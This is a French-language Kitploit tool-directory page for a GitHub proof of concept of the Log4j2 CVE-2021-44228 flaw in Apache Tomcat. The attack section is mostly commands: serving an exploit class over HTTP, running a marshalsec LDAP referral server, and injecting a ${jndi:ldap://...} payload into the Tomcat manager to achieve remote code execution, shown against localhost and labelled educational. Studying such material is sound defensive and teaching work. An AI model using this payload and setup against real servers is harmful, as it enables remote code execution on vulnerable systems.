Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
apache-tomcat-log4j — POC de vulnérabilité Log4j2 CVE-2021-44228 dans Apache Tomcat | Kitploit
Outils/GitHubGitHub/many-fac3d-g0d/apache-tomcat-log4j
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmany-fac3d-g0d/apache-tomcat-log4j

apache-tomcat-log4j

POC de vulnérabilité Log4j2 CVE-2021-44228 dans Apache Tomcat

Voir le dépôt
5il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC de la vulnérabilité Log4j2 CVE-2021-44228 dans Apache Tomcat

Aperçu

GIF

Mise en place

Démarrer le serveur Tomcat

root@kitploit:~
git clone
cd apache-tomcat-10.0.14/bin
startup.bat

Servir la classe d'exploit

root@kitploit:~
cd exploit
py -m http.server 8888
root@kitploit:~
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Attaque

Saisissez ${jndi:ldap://127.0.0.1:1389/Exploit} dans le champ 'XML Configuration file path' de l'application manager à http://localhost:8080/manager/html

La classe d'exploit est chargée et la RCE est déclenchée (l'application Calculatrice s'ouvrira)

Clause de non-responsabilité

Ce dépôt est simplement un POC réalisé à des fins éducatives. Le propriétaire du dépôt n'est pas responsable des dommages causés. En guise de note morale, ne faites pas le mal.

Références

Exploit LDAP https://github.com/mbechler/marshalsec

Télécharger l’outil